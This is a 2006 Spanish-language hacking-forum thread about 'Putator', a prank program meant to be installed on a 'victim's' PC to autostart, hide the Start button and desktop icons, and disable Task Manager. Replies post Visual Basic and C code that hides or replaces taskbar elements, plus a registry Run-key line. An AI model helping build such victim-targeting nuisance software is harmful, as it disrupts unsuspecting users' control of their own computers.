elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Putator v1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Putator v1  (Leído 1,408 veces)
soru13

Desconectado Desconectado

Mensajes: 246



Ver Perfil
Putator v1
« en: 17 Agosto 2006, 23:32 pm »

bueno, aqui le traigo el codigo fuente de un programa mio, que es hace una buena putada a la victima....

Bien, hay 2 proyectos, el 1º se debe ejecutar entonces lo que hace es que aloja el programa que "putea" a la victima en una carpeta del Disco duro, entonces cuando arranca windows carga este programa, lo que hace es ocultar el boton inicio,bloquear el administrador de tareas, y ocultar todos los iconos del escritorio,cuando lo carga al arrancar windows hay una opcion de desactivarlo metiendo una clave.... la predeterminada que yo puse es QAZWSX (en minusculas)....

http://files.filefront.com/putatorrar/;5418509;;/fileinfo.html

espero que les sirva, lo pueden personalizar y modificar...


« Última modificación: 18 Agosto 2006, 00:23 am por soru13 » En línea

Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: Putator v1
« Respuesta #1 en: 17 Agosto 2006, 23:49 pm »

Para acompletarlo puedes hacer que cambie el boton de inicio por otro que tenga otro nombre , creas un nuevo boton obtienes el handle del boton de inicio y lo cambias un ejemplo.
Código:
Const WS_CHILD = &H40000000
Const WM_LBUTTONDOWN = &H201
Const WM_LBUTTONUP = &H202
Const SW_HIDE = 0
Const SW_NORMAL = 1
Private Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
Dim tWnd As Long, bWnd As Long, ncWnd As Long
Private Sub Form_Load()
    Dim R As RECT
    'Se obtiene el handle del taskbar
    tWnd = FindWindow("Shell_TrayWnd", vbNullString)
    'se obtiene el handle del boton de iniciop
    bWnd = FindWindowEx(tWnd, ByVal 0&, "BUTTON", vbNullString)
    GetWindowRect bWnd, R
    'Creamos un nuevo boton
    ncWnd = CreateWindowEx(ByVal 0&, "BUTTON", "elhacker.net", WS_CHILD, 0, 0, R.Right - R.Left, R.Bottom - R.Top, tWnd, ByVal 0&, App.hInstance, ByVal 0&)
    'se muestra nuestro boton
    ShowWindow ncWnd, SW_NORMAL
    'Se esconde el boton de inicio
    ShowWindow bWnd, SW_HIDE
End Sub
Private Sub Form_Unload(Cancel As Integer)
ShowWindow bWnd, SW_NORMAL 'Muestra el boton normal
    'se destruye nuestro boton
    DestroyWindow ncWnd
End Sub

Hace poco de practica hice tambien un codigo para esconder boton de inicio ,taskbar,tray,ventanas minimizadas,quick launch etc... pero en C
las declaraciones de las apis basicamente son casi iguales.

Código:
#include "windows.h"
#include "stdio.h"

/*Variables globales*/
HWND  ventana,ventana2;
 char resp;

/*prototipos*/
void taskbar(char on);
void tray(char on);
void windo(char on);
void launch(char on);
void inicio(char on);
void opciones(void);
int main()
{
for(;;)
{
   opciones();
}
return 0;
}
/*Opciones a elegir*/
void opciones()
{
printf("\t\t\tEsconder botones de windows\n\n\n");
printf("Elija una opcion:\n\n");
printf("A)Esconder taskbar\na)Mostrar taskbar\n");
printf("B)Esconder tray y reloj\nb)Mostrar tray\n");
printf("C)Esconder Ventanas minizadas\nc)Mostrar ventanas minimizadas\n");
printf("D)Esconder QuickLaunch\nd)Mostrar QuickLaunch\n");
printf("E)Esconder boton de Inicio\ne)Mostrar boton de inicio\n");
printf("Elija una opcion y pulse enter :");
resp = getchar();
 switch (resp)
 {
 case 'A':
taskbar('s');   break;
 case 'a':
     taskbar('n');   break;
 case 'B':
     tray('s');      break;
 case 'b':
     tray('n');      break;
 case 'C':
     windo('s');     break;
 case 'c':
     windo('n'); break;
 case 'D':
     launch('s'); break;
 case 'd':
      launch('n'); break;
 case 'E':
      inicio('s'); break;
 case 'e':
      inicio('n'); break;
 }
 system("cls");
}

/*Funcion para esconder taskbar*/
void taskbar(char on)
{
if (on=='s')
{
    ventana = FindWindowA("Shell_traywnd",NULL);/*Encontramos el Handle */
ShowWindow(ventana,SW_HIDE);/*Se oculta con SW_HIDE*/
}
else
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ShowWindow(ventana,SW_SHOW);
}
}

//Funcion para Iconos minizados y reloj  en el taskbar
void tray(char on)
{
if (on=='s')
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (ventana,NULL,"TrayNotifywnd",NULL);/*Entre las ventanas
hijas buscamos El tray*/
        ShowWindow(ventana2,SW_HIDE);
}
else
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (ventana,NULL,"TrayNotifywnd",NULL);
ShowWindow(ventana2,SW_SHOW);
}
}
//Ventanas en taskbar
void windo(char on)

{
if (on=='s')
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (ventana,NULL,"ReBarWindow32",NULL);
        ShowWindow(ventana2,SW_HIDE);
}
else
{
ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (ventana,NULL,"ReBarWindow32",NULL);
ShowWindow(ventana2,SW_SHOW);
}
}

//Quick launch
void launch(char on)

{
if (on=='s')
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (FindWindowExA(ventana,NULL,"ReBarWindow32",NULL),NULL,"ToolBarWindow32",NULL);
        ShowWindow(ventana2,SW_HIDE);
}
else
{
ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = FindWindowExA (FindWindowExA(ventana,NULL,"ReBarWindow32",NULL),NULL,"ToolBarWindow32",NULL);
ShowWindow(ventana2,SW_SHOW);
}
}

//Boton de inicio
void inicio(char on)

{
if (on=='s')
{
    ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = GetWindow(ventana,GW_CHILD);
ShowWindow(ventana2,SW_HIDE);
}
else
{
ventana = FindWindowA("Shell_traywnd",NULL);
ventana2 = GetWindow(ventana,GW_CHILD);
ShowWindow(ventana2,SW_SHOW);
}
}
salu2  ;)
pd:El codigo que puse en C se puede optimizar mucho


« Última modificación: 17 Agosto 2006, 23:51 pm por Robokop » En línea

soru13

Desconectado Desconectado

Mensajes: 246



Ver Perfil
Re: Putator v1
« Respuesta #2 en: 17 Agosto 2006, 23:54 pm »

no me hace falta eso, yo lo que quiero es k no salga para no poder darle
En línea

Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: Putator v1
« Respuesta #3 en: 17 Agosto 2006, 23:58 pm »

no me hace falta eso, yo lo que quiero es k no salga para no poder darle
Te lo cambia por otro y se puede clickear pero no pasa nada .
Lo deja inservible el codigo de C te lo puse por si te podria ayudar este tipo de cosas
Código:
FindWindowExA (ventana,NULL,"TrayNotifywnd",NULL);/*Entre las ventanas 
que de igual modo se lo puedes aplicar a tu proyecto.
por cierto no veo donde se agregue al registro...
En el form iconos no hace nada en el registro.
en el form del login tampoco
en el formulario de form1 solamente deshabilita el taskmanager
en el form de desactivar solamente vuelve a habilitarlo y borras esta clave
Código:
MiObjeto.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NombreClave"
que nunca se creo

« Última modificación: 18 Agosto 2006, 00:34 am por Robokop » En línea

Hans el Topo


Desconectado Desconectado

Mensajes: 1.754


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: Putator v1
« Respuesta #4 en: 18 Agosto 2006, 00:14 am »

podrias poner otro boton que al clicarlo hiciese alguna putadilla más...xD
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines